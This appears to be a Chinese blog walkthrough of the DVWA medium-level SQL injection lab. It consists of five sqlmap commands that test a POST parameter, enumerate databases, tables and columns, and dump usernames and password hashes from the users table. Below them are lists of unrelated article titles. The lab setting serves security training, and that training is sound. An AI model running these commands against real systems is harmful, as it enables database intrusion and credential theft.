中级注入的提交方式从get请求改为post请求,可以用burp抓包注入或抓注入点

1 .  判断是否有注入

sqlmap -u "http://192.168.242.1/dvw/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=svb0idqkd55tee4mbckj3ejht5" --data "id=2&Submit=Submit"

2. 爆数据库名

sqlmap -u "http://192.168.242.1/dvw/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=svb0idqkd55tee4mbckj3ejht5" --data "id=2&Submit=Submit" –dbs

3. 爆数据库的表

sqlmap -u "http://192.168.242.1/dvw/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=svb0idqkd55tee4mbckj3ejht5" --data "id=2&Submit=Submit" –tables –D “dvwa”

4 . 爆数据库表的字段

sqlmap -u "http://192.168.242.1/dvw/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=svb0idqkd55tee4mbckj3ejht5" --data "id=2&Submit=Submit" –columns –D “dvwa” –T “users”

5.爆账号密码

sqlmap -u "http://192.168.242.1/dvw/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=svb0idqkd55tee4mbckj3ejht5" --data "id=2&Submit=Submit" --dump -D "dvwa" -T "users" -C "user,password"

最新文章

  1. JavaScript通过元素id和name直接获取元素的方法
  2. linux下core dump【总结】
  3. vim基础命令
  4. Tornado 异步客户端
  5. 使用CocoaPods管理第三方开源类库
  6. HTTP长连接短连接
  7. 关于MYSQL group by 分组按时间取最大值的实现方法!
  8. CRC32 vs Java.HashCode
  9. OpenGL【2 坐标转换】
  10. discuz相关总结
  11. react-native 导航器 react-navigation 3.x 使用
  12. NOIP2016 巨凉无比的感言
  13. 2845 ACM 豆子 beans
  14. Eclipse java项目将普通文件转化为Source文件的操作
  15. 将目录结构输出为json格式(zTree)
  16. http put post请求区别
  17. Filebeat配置paths里,不支持递归所有子目录
  18. 辛星和你彻底搞清CSS中的相对定位和绝对定位
  19. Android自动化测试工具之—UiAutomator环境配置
  20. C++ 无限定名称查找

热门文章

  1. 在类中,调用这个类时,用$this->video_model是不是比每次调用这个类时D('Video')效率更高呢
  2. System.Web.Mvc.RouteAttribute.cs
  3. Eclipse_断点设置不起作用
  4. 「APIO 2019」奇怪装置
  5. 侧滑关闭Activity的解决方案——SwipeBackLayout
  6. spark 应用场景2-身高统计
  7. 编写main方法
  8. Python全栈开发:XML与parse对比
  9. 安装tomcat8.5
  10. JavaWeb读取资源文件的四种方式